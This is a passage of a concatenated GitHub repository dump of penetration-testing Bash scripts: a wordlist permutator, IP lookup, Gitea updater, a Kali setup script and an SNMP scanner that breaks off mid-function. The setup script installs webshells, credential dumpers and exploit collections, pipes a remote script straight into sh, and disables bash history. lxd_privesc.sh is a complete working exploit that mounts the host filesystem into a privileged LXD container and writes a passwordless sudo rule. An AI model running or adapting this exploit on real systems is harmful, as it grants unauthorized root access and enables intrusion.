29 |             nth=${lower:permutation-1}
30 |             lower=$(echo ${lower:0:permutation-1}${nth^})
31 |         fi
32 |         
33 |         echo -n ${TOUPPER:0:i}
34 |         echo ${lower:i}
35 |         
36 |     done
37 | 
38 | done | sort -u
39 | 


--------------------------------------------------------------------------------
/getip.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | 
 4 | function get_public_ip {
 5 | 	curl -s http://whatismijnip.nl | cut -d " " -f 5
 6 | }  # end function get_public_ip
 7 | 
 8 | 
 9 | function get_private_ip {
10 |         ip a | grep 'inet ' | awk {'print $2'}
11 | }  # end function get_prviate_ip
12 | 
13 | 
14 | echo "[*] Getting IP Addresses, Please Wait..."
15 | 
16 | PUBLIC=$( get_public_ip )
17 | PRIVATE=$( get_private_ip )
18 | 
19 | if [ "$PUBLIC" != "" ]
20 | then
21 |         echo "========================="
22 |         echo "Public: "
23 |         echo "-------------------------"
24 |         echo "$PUBLIC"
25 | else
26 |         echo "[!] Public IP address could not be found."
27 | fi
28 | 
29 | echo "========================="
30 | echo "Private: "
31 | echo "-------------------------"
32 | echo "$PRIVATE"
33 | echo "========================="
34 | 


--------------------------------------------------------------------------------
/getip_img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/getip_img.png


--------------------------------------------------------------------------------
/gitea-update.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # This script is used to auto-update Gitea when new versions come out
 3 | 
 4 | NEW_VERSION=$(curl -sL https://github.com/go-gitea/gitea/releases/latest | grep -Po '(?<=v)\d.\d\d.\d' | cut -d" " -f1 | head -n 1)
 5 | LOCATION=$(which gitea)
 6 | CURRENT_VERSION=$(gitea -v | grep -Po '\d.\d\d.\d')
 7 | 
 8 | 
 9 | if [ "$CURRENT_VERSION" != "$NEW_VERSION" ]; then
10 |         wget "https://dl.gitea.io/gitea/$NEW_VERSION/gitea-$NEW_VERSION-linux-arm-6" -O /tmp/gitea
11 |         if [ -f /tmp/gitea ]; then
12 |                 printf "[*] Successfully downloaded Gitea v$NEW_VERSION \n"
13 |                 chmod a+x /tmp/gitea
14 |                 mv $LOCATION $LOCATION.$CURRENT_VERSION.old
15 |                 mv /tmp/gitea $LOCATION
16 |                 printf "[*] Saved Gitea v$CURRENT_VERSION as $LOCATION.$CURRENT_VERSION.old \n"
17 |         else
18 |                 printf "[!] Failed to dowload Gitea. Check your internet connection and verify https://dl.gitea.io is accessible\n"
19 |                 exit 1
20 |         fi
21 | 
22 |         if [ ! command -v $LOCATION &> /dev/null ]; then
23 |                 printf "[!] FAILED to update Gitea \n"
24 |                 exit 1
25 |         fi
26 | else
27 |         printf "[*] Using the most current version of Gitea $CURRENT_VERSION \n"
28 |         gitea -v
29 | fi
30 | 


--------------------------------------------------------------------------------
/kali-setup.sh:
--------------------------------------------------------------------------------
  1 | # I do my best to keep this updated with tools I use so rebuilding a Kali ISO doesn't take all day
  2 | # Script runtime is about 20 minutes. If you have ideas to make this even faster feel free to contribute 
  3 | # Kali cant run this as a script. Copy and paste everything all at once.
  4 | #
  5 | # LAST TESTED: Kali 2022.1 on April 22, 2022
  6 | #
  7 | #uname -a
  8 | #Linux kali 5.15.0-kali3-amd64 #1 SMP Debian 5.15.15-2kali1 (2022-01-31) x86_64 GNU/Linux
  9 | #
 10 | #lsb_release -a      
 11 | #Distributor ID: Kali
 12 | #Description:    Kali GNU/Linux Rolling
 13 | #Release:        2022.1
 14 | #Codename:       kali-rolling
 15 | #
 16 | # BELOW IS HOW I MAPPED A SHARED FOLDER TO MY KALI VM IN VMWARE WORKSTATION PRO 17.5 VM
 17 | # sudo mkdir -p /mnt/hgfs/KaliShare
 18 | # sudo vim /etc/fstab
 19 | # # ADD LINE
 20 | #.host:/KaliShare /mnt/hgfs/KaliShare fuse.vmhgfs-fuse defaults,allow_other,auto_unmount 0 0
 21 | #
 22 | # SAVE CHANGES AND DO
 23 | # sudo systemctl daemon-reload
 24 | # sudo mount -a
 25 | # 
 26 | echo "Setup Burpsuite CA Certificate and set 'Enable Interception at Startup' to 'Always Disable'"
 27 | 
 28 | # SERVICES
 29 | sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
 30 | sudo msfdb init
 31 | sudo systemctl enable postgresql --now
 32 | 
 33 | # PRE-REQUISITE AND PIP INSTALLS 
 34 | sudo apt-get install cmake -y
 35 | sudo apt-get install gdb -y
 36 | sudo apt-get install libwine -y
 37 | sudo apt-get install python-setuptools -y
 38 | sudo apt-get install python3-setuptools -y
 39 | sudo apt-get install python2-dev python2 python-dev-is-python3 -y
 40 | sudo apt-get install python3-pip -y
 41 | sudo apt-get install python-pip -y
 42 | sudo apt-get install seclists -y
 43 | python2 -m easy_install pip
 44 | pip2 install wheel
 45 | pip2 install keystone-engine
 46 | pip2 install capstone
 47 | pip2 install unicorn
 48 | pip2 install ropper
 49 | pip2 install colorama 
 50 | pip2 install pysnmp
 51 | pip2 install win_unicode_console
 52 | pip2 install discovery
 53 | pip2 install Crypto
 54 | pip2 install impacket
 55 | pip2 install iptools
 56 | pip2 install agents
 57 | pip2 install M2Crypto
 58 | pip2 install netifaces
 59 | pip2 install pydispatch
 60 | pip2 install samba
 61 | pip2 install pwn
 62 | pip2 install pwntools
 63 | pip2 install pysmbclient
 64 | pip2 install pytelnet
 65 | pip2 install secret
 66 | pip3 install secret
 67 | pip3 install stegcracker
 68 | pip3 install csvkit
 69 | pip2 install ssh
 70 | pip2 install webapp2
 71 | pip2 install lxml
 72 | pip2 install ssl
 73 | pip2 install pycrypto
 74 | pip2 install virtualenv
 75 | pip2 install cme
 76 | pip2 install bloodhound
 77 | pip3 install virtualenv
 78 | pip3 install scanless
 79 | pip3 install minidump minikerberos aiowinreg msldap winsspi
 80 | pip3 install pypykatz
 81 | python3 -m pip install web3
 82 | # GEF BUILD FOR GDB
 83 | python3 -m pip install pwntools
 84 | python3 -m pip install keystone-engine
 85 | python3 -m pip install capstone
 86 | python3 -m pip install unicorn
 87 | python3 -m pip install ropper
 88 | wget https://raw.githubusercontent.com/hugsy/stuff/master/update-trinity.sh
 89 | chmod +x update-trinity.sh
 90 | ./update-trinity.sh
 91 | 
 92 | # GEM INSTALLS
 93 | gem update --system
 94 | gem install winrm
 95 | gem install winrm-s
 96 | gem install winrm-fs
 97 | gem install evil-winrm
 98 | gem install bettercap
 99 | 
100 | # APT INSTALLS
101 | sudo apt-get install beef -y
102 | sudo apt-get install ncat -y
103 | sudo apt-get install imagemagick -y
104 | sudo apt-get install stoken -y
105 | sudo apt-get install maven -y
106 | sudo apt-get install brutespray -y
107 | sudo apt-get install ismtp -y
108 | sudo apt-get install checksec -y
109 | sudo apt-get install reaver -y
110 | sudo apt-get install seahorse -y
111 | sudo apt-get install catdoc -y
112 | sudo apt-get install seahorse-nautilus -y
113 | sudo apt-get install guake -y
114 | sudo mkdir /usr/share/guake/data
115 | sudo cp /usr/share/guake/autostart-guake.desktop /usr/share/guake/data/autostart-guake.desktop
116 | sudo apt-get install awscli -y
117 | sudo apt-get install xclip -y
118 | sudo apt-get install crowbar -y
119 | sudo apt-get install jxplorer -y
120 | sudo apt-get install armitage -y
121 | sudo apt-get install nfs-kernel-server -y
122 | sudo apt-get install bettercap -y
123 | sudo apt-get install putty-tools -y
124 | sudo apt-get install httptunnel -y
125 | sudo apt-get install exiftool -y
126 | sudo apt-get install squid -y
127 | sudo apt-get install squidclient -y
128 | sudo apt-get install xlsx2csv -y
129 | sudo apt-get install squid-cgi -y
130 | sudo apt-get install squid-common -y
131 | sudo apt-get install encfs -y
132 | sudo apt-get install gdbserver -y
133 | sudo apt-get install qemu-utils -y
134 | sudo apt-get install libcurl4-openssl-dev -y
135 | sudo apt-get install steghide -y
136 | sudo apt-get install evil-ssdp
137 | sudo apt-get install mingw-w64 -y
138 | sudo apt-get install smtp-user-enum -y 
139 | sudo apt-get install lftp -y
140 | sudo apt-get install python3-pip -y
141 | sudo apt-get install unicornscan -y
142 | sudo apt-get install shellter -y
143 | sudo apt-get install firewalk -y
144 | sudo apt-get install gobuster -y
145 | sudo apt-get install ruby-full -y
146 | sudo apt-get install libpcap-dev -y
147 | sudo apt-get install rlwrap -y
148 | sudo apt-get install neo4j -y
149 | sudo apt-get install bloodhound -y
150 | sudo apt-get install ident-user-enum -y
151 | sudo apt-get install cargo -y
152 | sudo apt-get install npm -y
153 | sudo apt-get install npm --fix-broken -y
154 | sudo apt-get install powershell -y
155 | sudo apt-get install ghidra -y
156 | sudo apt-get install sslstrip -y
157 | sudo apt-get install powercat -y
158 | sudo apt-get install autorecon -y
159 | sudo apt-get install unicorn -y
160 | sudo apt-get install empire -y
161 | sudo apt-get install pspy -y
162 | sudo apt-get install sshuttle -y
163 | sudo apt-get install chisel -y
164 | 
165 | # TMUX 
166 | cd /opt
167 | sudo touch /root/.tmux.conf
168 | sudo git clone https://github.com/tmux-plugins/tmux-logging.git
169 | sudo echo "set -g history-limit 50000" >> ~/.tmux.conf
170 | sudo echo "set -g allow-rename off" >> ~/.tmux.conf
171 | sudo echo " " >> ~/.tmux.conf
172 | sudo echo -en "bind-key j command-prompt -p \"join pane from:\" \"join-pane -s \'%%\'\"\n" >> ~/.tmux.conf
173 | sudo echo -en "bind-key s command-prompt -p \"join pane to:\" \"join-pane -t '%%'\"" >> ~/.tmux.conf
174 | sudo echo " " >> ~/.tmux.conf
175 | sudo echo "set-window-option -g mode-keys vi" >> ~/.tmux.conf
176 | sudo echo "run-shell /opt/tmux-logging/logging.tmux" >> ~/.tmux.conf
177 | sudo echo " " >> ~/.tmux.conf
178 | sudo echo "set -g @plugin 'tmux-plugins/tmux-logging'" >> ~/.tmux.conf
179 | sudo echo " " >> ~/.tmux.conf
180 | sudo echo -en "set -g default-terminal \"screen-256color\"\n" >> ~/.tmux.conf
181 | sudo echo "" >> ~/.tmux.conf
182 | sudo echo 'run-shell /opt/tmux-logging/logging.tmux' >> ~/.tmux.conf
183 | 
184 | # PROXIES
185 | sudo mkdir /usr/share/proxies
186 | cd /usr/share/proxies
187 | sudo git clone https://github.com/sensepost/reGeorg.git
188 | sudo git clone https://github.com/jpillora/chisel.git
189 | cd sshuttle
190 | sudo ./setup.py install
191 | 
192 | # /USR/SHARE
193 | cd /usr/share
194 | sudo git clone https://github.com/opsdisk/pagodo.git
195 | cd pagodo
196 | sudo pip install -r requirements.txt
197 | cd /usr/share
198 | cd /tmp
199 | sudo wget http://launchpadlibrarian.net/70808584/python-twisted-web_11.0.0-1_all.deb
200 | sudo dpkg -i python-twisted-web_11.0.0-1_all.deb -y
201 | sudo apt install -f
202 | pip install service_identity
203 | sudo dpkg -i python-twisted-web_11.0.0-1_all.deb -y
204 | cd /usr/share
205 | sudo git clone https://github.com/int0x33/nc.exe.git
206 | sudo git clone https://github.com/fuzzdb-project/fuzzdb.git
207 | sudo git clone https://github.com/RUB-NDS/PRET.git
208 | sudo ln -sf /usr/share/PRET/pret.py /usr/local/bin/pret
209 | sudo git clone https://github.com/AlessandroZ/LaZagne.git
210 | pip3 install -r /usr/share/LaZagne/requirements.txt
211 | pip3 install -r /usr/share/LaZagne/requirements.txt
212 | sudo git clone https://github.com/Keramas/DS_Walk
213 | sudo git clone https://github.com/internetwache/GitTools.git
214 | sudo git clone https://github.com/tarunkant/Gopherus.git
215 | cd /usr/share/Gopherus
216 | /usr/share/Gopherus/install.sh
217 | cd /usr/share
218 | sudo git clone https://boringssl.googlesource.com/boringssl
219 | sudo git clone --recursive https://github.com/cloudflare/quiche
220 | cd quiche
221 | cargo build --examples
222 | QUICHE_BSSL_PATH="/usr/share/boringssl" cargo build --examples
223 | cd /usr/share/
224 | sudo git clone https://github.com/frohoff/ysoserial.git
225 | sudo git clone https://github.com/skelsec/pypykatz.git
226 | sudo python /usr/share/pypykatz/setup.py install
227 | sudo git clone https://github.com/arthaud/git-dumper.git
228 | sudo git clone https://github.com/trickster0/Enyx.git
229 | sudo cp /usr/share/Enyx/enyx.py /usr/local/bin/enyx
230 | sudo chmod a+x /usr/local/bin/enyx
231 | sudo git clone https://github.com/superkojiman/rfishell.git
232 | sudo git clone https://github.com/ccavxx/Kadimus.git
233 | sudo git clone https://github.com/pwntester/ysoserial.net.git
234 | sudo wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
235 | sudo tar xzf finger-user-enum-1.0.tar.gz
236 | 
237 | # WINDOWS RESOURCES
238 | cd /usr/share/windows-resources
239 | sudo git clone https://github.com/irsdl/IIS-ShortName-Scanner
240 | sudo git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
241 | cd /usr/share/windows-resources/SprayingToolkit
242 | sudo pip3 install -r requirements.txt
243 | sudo git clone https://github.com/peewpw/Invoke-WCMDump.git
244 | sudo git clone https://github.com/rasta-mouse/Sherlock.git
245 | sudo git clone https://github.com/rasta-mouse/Watson.git
246 | sudo git clone https://github.com/cyberark/RiskySPN.git
247 | sudo git clone https://github.com/EliteLoser/Invoke-PsExec.git
248 | sudo git clone https://github.com/ZilentJack/Spray-Passwords.git
249 | sudo git clone https://github.com/fox-it/BloodHound.py.git
250 | sudo git clone https://github.com/SafeBreach-Labs/SirepRAT.git
251 | sudo git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
252 | sudo git clone https://github.com/bitsadmin/wesng.git
253 | sudo git clone https://github.com/tobor88/ReversePowerShell.git
254 | sudo git clone https://github.com/tobor88/PowerShell-Red-Team.git
255 | sudo git clone https://github.com/TsukiCTF/Lovely-Potato.git
256 | sudo git clone https://github.com/SecWiki/windows-kernel-exploits.git
257 | sudo git clone https://github.com/Arvanaghi/SessionGopher.git
258 | sudo git clone https://github.com/411Hall/JAWS.git
259 | sudo git clone https://github.com/davehardy20/sysinternals.git
260 | sudo git clone https://github.com/AlessandroZ/BeRoot.git
261 | sudo mkdir /usr/share/linux-resources/BeRoot
262 | sudo mv /usr/share/windows-resources/BeRoot/Linux/* /usr/share/linux-resources/BeRoot/
263 | sudo mv /usr/share/windows-resources/BeRoot/Windows/* /usr/share/windows-resources/BeRoot/
264 | sudo rm -r /usr/share/windows-resources/BeRoot/Windows/
265 | sudo rm -r /usr/share/windows-resources/BeRoot/Linux/
266 | 
267 | # LINUX RESOURCES
268 | sudo mkdir /usr/share/linux-resources
269 | cd /usr/share/linux-resources
270 | sudo git clone https://github.com/mzet-/linux-exploit-suggester.git
271 | sudo git clone https://github.com/rebootuser/LinEnum.git
272 | sudo git clone https://github.com/DominicBreuker/pspy.git
273 | sudo git clone https://github.com/huntergregal/mimipenguin
274 | sudo cp /usr/share/linux-resources/mimipenguin.sh /var/www/html/mimipenguin.sh
275 | cp /usr/share/linux-resources/mimipenguin.py /var/www/html/mimipenguin.py
276 | sudo git clone https://github.com/jondonas/linux-exploit-suggester-2.git
277 | sudo git clone https://github.com/saghul/lxd-alpine-builder.git
278 | sudo /usr/share/linux-resources/lxd-alpine-builder/build-alpine
279 | sudo cp /usr/share/linux-resources/lxd-apline/builder/alpine-v*.tar.gz /var/www/html/
280 | sudo git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
281 | sudo mv privilege-escalation-awesome-scripts-suite/linPEAS/ /usr/share/linux-resources/
282 | sudo mv privilege-escalation-awesome-scripts-suite/winPEAS/ /usr/share/windows-resources/
283 | sudo cp privilege-escalation-awesome-scripts-suite/README.md /usr/share/windows-resources/
284 | sudo cp privilege-escalation-awesome-scripts-suite/README.md /usr/share/linux-resources/
285 | sudo rm -r -- /usr/share/linux-resources/privilege-escalation-awesome-scripts-suite
286 | 
287 | # WEBSHELLS
288 | cd /usr/share/webshells/php
289 | sudo git clone https://github.com/flozz/p0wny-shell.git
290 | sudo git clone https://github.com/WhiteWinterWolf/wwwolf-php-webshell.git
291 | sudo git clone https://github.com/jgor/php-jpeg-shell.git
292 | sudo git clone https://github.com/epinna/weevely3.git
293 | 
294 | # APACHE2 SITE
295 | cd /var/www
296 | sudo git clone https://github.com/tobor88/PayloadSiteForPenTesters.git
297 | sudo cp /var/www/PayloadSiteForPenTesters/* /var/www/html/
298 | sudo cp /usr/share/windows-resources/Lovely-Potato/* /var/www/html/
299 | 
300 | # DEBUGGERS
301 | sudo wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
302 | 
303 | # CONFIGURE FTP SERVER ALLOW DOWNLOADS ONLY
304 | sudo apt-get install vsftpd -y
305 | sudo mkdir -p /var/ftp/public
306 | sudo chown nobody:nogroup /var/ftp/public
307 | sudo useradd ftpsecure
308 | sudo cp /etc/vsftpd.conf /etc/vsftpd.conf.bak
309 | sudo echo '# VSFTP SERVER ANONYMOUS DOWNLOADS' > /etc/vsftpd.conf
310 | sudo echo "listen=YES" >> /etc/vsftpd.conf
311 | sudo echo "listen_ipv6=NO" >> /etc/vsftpd.conf
312 | sudo echo "anonymous_enable=YES" >> /etc/vsftpd.conf
313 | sudo echo "local_enable=NO" >> /etc/vsftpd.conf
314 | sudo echo "write_enable=NO" >> /etc/vsftpd.conf
315 | sudo echo "local_umask=022" >> /etc/vsftpd.conf
316 | sudo echo "anon_upload_enable=NO" >> /etc/vsftpd.conf
317 | sudo echo "anon_mkdir_write_enable=NO" >> /etc/vsftpd.conf
318 | sudo echo "anon_other_write_enable=NO" >> /etc/vsftpd.conf
319 | sudo echo "dirmessage_enable=YES" >> /etc/vsftpd.conf
320 | sudo echo "use_localtime=YES" >> /etc/vsftpd.conf
321 | sudo echo "xferlog_enable=YES" >> /etc/vsftpd.conf
322 | sudo echo "connect_from_port_20=YES" >> /etc/vsftpd.conf
323 | sudo echo "chown_uploads=YES" >> /etc/vsftpd.conf
324 | sudo echo "chown_username=nobody" >> /etc/vsftpd.conf
325 | sudo echo "xferlog_file=/var/log/vsftpd.log" >> /etc/vsftpd.conf
326 | sudo echo "idle_session_timeout=60" >> /etc/vsftpd.conf
327 | sudo echo "data_connection_timeout=120" >> /etc/vsftpd.conf
328 | sudo echo "accept_timeout=60" >> /etc/vsftpd.conf
329 | sudo echo "connect_timeout=60" >> /etc/vsftpd.conf
330 | sudo echo "nopriv_user=ftpsecure" >> /etc/vsftpd.conf
331 | sudo echo "async_abor_enable=YES" >> /etc/vsftpd.conf
332 | sudo echo "ascii_upload_enable=NO" >> /etc/vsftpd.conf
333 | sudo echo "ascii_download_enable=NO" >> /etc/vsftpd.conf
334 | sudo echo "ftpd_banner=FTP Anonymous Download Server" >> /etc/vsftpd.conf
335 | sudo echo "anon_root=/var/ftp/public/" >> /etc/vsftpd.conf
336 | sudo echo "no_anon_password=YES" >> /etc/vsftpd.conf
337 | sudo echo "anon_max_rate=30000" >> /etc/vsftpd.conf
338 | sudo echo "hide_ids=YES" >>/etc/vsftpd.conf
339 | sudo echo "pasv_min_port=40000" >> /etc/vsftpd.conf
340 | sudo echo "pasv_max_port=42000" >> /etc/vsftpd.conf
341 | sudo echo "secure_chroot_dir=/var/run/vsftpd/empty" >> /etc/vsftpd.conf
342 | sudo echo "pam_service_name=vsftpd" >> /etc/vsftpd.conf
343 | sudo echo "ls_recurse_enable=NO" >> /etc/vsftpd.conf
344 | sudo echo "utf8_filesystem=YES" >> /etc/vsftpd.conf
345 | sudo echo "one_process_model=YES" >> /etc/vsftpd.conf
346 | sudo echo "ssl_enable=NO" >> /etc/vsftpd.conf
347 | sudo echo "rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem" >> /etc/vsftpd.conf
348 | sudo echo "rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key" >> /etc/vsftpd.conf
349 | sudo systemctl enable vsftpd
350 | sudo systemctl start vsftpd
351 | 
352 | # BASH PROFILES
353 | sudo  ln -sf /dev/null /root/.bash_history
354 | ln -sf /dev/null /home/kali/.bash_history
355 | 
356 | sed -i 's/HISTSIZE=1000/HISTSIZE=10000/g' /home/kali/.bashrc
357 | sed -i 's/HISTFILESIZE=2000/HISTSIZE=20000/g' /home/kali/.bashrc
358 | sudo sed -i 's/HISTSIZE=1000/HISTSIZE=10000/g' /root/.bashrc
359 | sudo sed -i 's/HISTFILESIZE=2000/HISTSIZE=20000/g' /root/.bashrc
360 | echo 'export EDITOR="vim"' >> /home/kali/.bashrc
361 | echo 'export VISUAL="vim"' >> /home/kali/.bashrc
362 | echo 'NMAP="/usr/share/nmap/scripts"' >> /home/kali/.bashrc
363 | echo 'IMPACKET="/usr/share/doc/python3-impacket/examples"' >> /home/kali/.bashrc
364 | 
365 | sudo cp /home/kali/.bashrc /root/
366 | sudo cp /home/kali/.profile /root/
367 | 
368 | sudo mkdir -p /root/HTB/Boxes
369 | sudo mkdir /root/HTB/Challenges
370 | sudo mkdir /root/HTB/Labs
371 | 
372 | echo "Creating bash aliases"
373 | # Bash Aliases
374 | sudo echo "alias ls='ls --color=auto'" > /root/.bash_aliases
375 | sudo echo "alias dir='dir --color=auto'" >> /root/.bash_aliases
376 | sudo echo "alias vdir='vdir --color=auto'">> /root/.bash_aliases
377 | sudo echo "alias grep='grep --color=auto'" >> /root/.bash_aliases
378 | sudo echo "alias fgrep='fgrep --color=auto'" >> /root/.bash_aliases
379 | sudo echo "alias egrep='egrep --color=auto'" >> /root/.bash_aliases
380 | sudo echo "alias ll='ls -la'" >> /root/.bash_aliases
381 | sudo echo "alias la='ls -lashF'" >> /root/.bash_aliases
382 | sudo echo "alias l='ls -CF'" >> /root/.bash_aliases
383 | sudo echo "alias cd..='cd ..'" >> /root/.bash_aliases
384 | sudo echo "alias cls='clear'" >> /root/.bash_aliases
385 | sudo echo "alias pyhton='python'" >> /root/.bash_aliases
386 | sudo echo "alias pyhton3='python3'" >> /root/.bash_aliases
387 | 
388 | echo "alias ls='ls --color=auto'" > /home/kali/.bash_aliases
389 | echo "alias dir='dir --color=auto'" >> /home/kali/.bash_aliases
390 | echo "alias vdir='vdir --color=auto'">> /home/kali/.bash_aliases
391 | echo "alias grep='grep --color=auto'" >> /home/kali/.bash_aliases
392 | echo "alias fgrep='fgrep --color=auto'" >> /home/kali/.bash_aliases
393 | echo "alias egrep='egrep --color=auto'" >> /home/kali/.bash_aliases
394 | echo "alias ll='ls -la'" >> /home/kali/.bash_aliases
395 | echo "alias la='ls -lashF'" >> /home/kali/.bash_aliases
396 | echo "alias l='ls -CF'" >> /home/kali/.bash_aliases
397 | echo "alias cd..='cd ..'" >> /home/kali/.bash_aliases
398 | echo "alias cls='clear'" >> /home/kali/.bash_aliases
399 | echo "alias pyhton='python'" >> /home/kali/.bash_aliases
400 | echo "alias pyhton3='python3'" >> /home/kali/.bash_aliases
401 | sudo chown kali:kali /home/kali/.bash_aliases
402 | 
403 | sudo systemctl stop nfs-server.service
404 | sudo systemctl disable nfs-server.service
405 | 
406 | sudo bash
407 | cd /root
408 | sudo git clone https://github.com/tobor88/Bash
409 | cd Bash
410 | sudo chmod u+x *.sh
411 | sudo bash
412 | FILES=$(ls *.sh)
413 | for f in $FILES; do cp "$f" /usr/local/bin/"${f%.sh}"; done
414 | exit
415 | sudo ssh-keygen -t ed25519 -f /root/.ssh
416 | su -c "ssh-keygen -t ed25519 -f /home/kali/.ssh" kali
417 | source ~/.bashrc
418 | source ~/.profile
419 | 
420 | sudo updatedb
421 | 
422 | # Computer needs a restart after docker-compose is installed
423 | # DOCKER INSTALLS
424 | sudo apt-get install docker -y
425 | sudo apt-get install docker.io -y
426 | sudo curl -L "https://github.com/docker/compose/releases/download/1.26.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
427 | sudo chmod +x /usr/local/bin/docker-compose
428 | sudo apt-get install docker-compose -y
429 | 


--------------------------------------------------------------------------------
/lxd_privesc.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # LXD Privilege Escalation Method
 3 | 
 4 | 
 5 | # Allow Ctrl+C to kill process
 6 | trap '
 7 |   trap - INT # restore default INT handler
 8 |   kill -s INT "$$"
 9 | ' INT
10 | 
11 | 
12 | if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
13 | # This option displays a help message and command execution examples
14 | 		echo ""
15 | 		echo "OsbornePro LXE Privilege Escalation 1.0 ( https://osbornepro.com )"
16 | 		echo ""
17 | 		echo "USAGE: ./lxd_privesc.sh <container name>"
18 | 		echo ""
19 | 		echo "OPTIONS:"
20 | 		echo "  -h : Displays the help information for the command."
21 | 		echo ""
22 | 		echo "EXAMPLES:"
23 | 		echo "  ./lxd_privesc.sh container1"
24 | 		echo "  # This example uses container1 to upgrade permissions for the current user"
25 | 		echo ""
26 | 		exit 0
27 | fi
28 | 
29 | lxc stop "$1" 2> /dev/null
30 | lxc config set "$1" security.privileged true || echo "[x] Failed to modify privilege"
31 | lxc start "$1" || echo "[x] Failed to start container $1"
32 | lxc config device add "$1" rootdisk disk source=/ path=/mnt/root recursive=true || echo "[x] Failed to mount filesystem"
33 | lxc exec "$1" -- /bin/sh -c "echo $USER 'ALL=(ALL)' NOPASSWD: ALL >> /mnt/root/etc/sudoers" || echo "[x] Failed to add sudo privilege"
34 | lxc config device remove "$1" rootdisk || echo "[x] Failed to unmount filesystem"
35 | lxc config set "$1" security.privileged false || echo "[x] Failed to modify privilege"
36 | lxc stop "$1"
37 | 
38 | echo "[*] Execution completed"
39 | 
40 | sudo id
41 | sudo bash
42 | 


--------------------------------------------------------------------------------
/massnmp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/massnmp.png


--------------------------------------------------------------------------------
/massnmp.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | #=================#
  3 | # MASSNMP SCANNER #
  4 | #=================#
  5 | # This script is meant to enumerate snmpv1 and snmpv2c in a subnet range you define or a single host
  6 | #
  7 | # REQUIRES: snmp-check and onesixtyone. 
  8 | #--------------------------------------------------------
  9 | # Install these tools if you do not have them installed.
 10 | #--------------------------------------------------------
 11 | #   Debian/Ubuntu/Mint/Kali
 12 | #     sudo apt-get -y install onesixtyone snmpcheck 
 13 | #
 14 | #   Fedora/RHEL/CentOS
 15 | #	sudo dnf -y install onesixtyone
 16 | #	sudo wget http://www.nothink.org/codes/snmpcheck/snmpcheck-1.9.rb
 17 | #	sudo cp snmpcheck-1.9.rb /usr/local/bin/snmp-check; sudo chmod a+x /usr/local/bin/snmp-check
 18 | #	sudo gem install snmp
 19 | 
 20 | TMPPATH="/tmp"
 21 | IPV4REGEX="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
 22 | USAGE="Syntax: $0 [-h] -n <network> [[[-s <int32: solo/start address>]] [-e <int32: end address>]] -v <int32: <snmp version> [-f <string: community string file>]
 23 | 
 24 | OsbornePro massnmp v1.1 ( https://osbornepro.com )
 25 | 
 26 | IMPORTANT!!!
 27 |     This command requires the tools 'onesixtyone' and 'snmpcheck'
 28 |     Installs these tools if you do not have them installed.
 29 | 
 30 |     USAGE: massnmp -n <string format is #.#.#> [[[-s <solo/start address>]] [-e <end address>]] -v <int32: <snmp version> [-f <string: community string list file>]
 31 | 
 32 |     OPTIONS:
 33 |         -h : Displays the help information for the command.
 34 | 	-n : Set the network subnet to perform the ping sweep on
 35 | 	-s : Set the solo or starting IP Address to begin the scan from
 36 | 	-e : Set the ending IP Address to scan too
 37 | 	-v : Define the version of SNMP to use [1|2c]
 38 | 	-f : Define the path to a file containing a list of community strings. 
 39 | 		(If -f is not defined common community string names will be tried)
 40 | 
 41 |     EXAMPLES:
 42 |           massnmp -n 192.168.0 -v 2c
 43 |             # This example scans SNMP version 2c from 192.168.0.1 to 192.168.0.254 testing 121 common community strings
 44 | 
 45 |           massnmp -n 192.168.0 -s 200 -v1
 46 |             # This example scans SNMP version 1 on 192.168.0.200
 47 | 
 48 | 	  massnmp -n 192.168.0 -s 128 -e 192 -v 2c -f /tmp/community.txt
 49 | 	    # This example scans SNMP version 2c from 192.168.0.128 to 192.168.0.192 using a custom list in /tmp/community.txt
 50 | 
 51 | "
 52 | 
 53 | 
 54 | 
 55 | function allow_ctrlc {
 56 | 
 57 | 	# Allow Ctrl+C to kill massnmp
 58 | 	trap '
 59 | 	  trap - INT # restore default INT handler
 60 | 	  kill -s INT "$$"
 61 | 	' INT
 62 | 
 63 | }  # End function allow_ctrlc
 64 | 
 65 | 
 66 | function print_usage {
 67 | 
 68 | 	printf "$USAGE\n" >&2
 69 | 	exit 1
 70 | 
 71 | }  # End function print_usage	
 72 | 
 73 | 
 74 | function verify_tools {
 75 | 	# Ensure the required binaries are usable
 76 | 	if ! command -v onesixtyone &> /dev/null; then
 77 | 		printf "[x] Requires onesixtyone and snmp-check to run. 
 78 | Install using below commands:
 79 | 
 80 |   Debian/Ubuntu/Mint/Kali
 81 |     CMD:  sudo apt-get -y install onesixtyone snmpcheck 
 82 | 
 83 |   Fedora/RHEL/CentOS
 84 |     CMD: sudo wget http://www.nothink.org/codes/snmpcheck/snmpcheck-1.9.rb
 85 |     CMD: sudo cp snmpcheck-1.9.rb /usr/local/bin/snmp-check; sudo chmod a+x /usr/local/bin/snmp-check
 86 |     CMD: sudo gem install snmp\n"
 87 | 		    exit 1
 88 | 	elif ! command -v snmp-check &> /dev/null; then
 89 | 		printf "[x] Requires snmp-check to run. 
 90 | Install using below commands
 91 | 
 92 |   Debian/Ubuntu/Mint/Kali
 93 |     CMD:  sudo apt-get -y install snmpcheck 
 94 | 
 95 |   Fedora/RHEL/CentOS
 96 |     CMD: sudo wget http://www.nothink.org/codes/snmpcheck/snmpcheck-1.9.rb
 97 |     CMD: sudo cp snmpcheck-1.9.rb /usr/local/bin/snmp-check; sudo chmod a+x /usr/local/bin/snmp-check
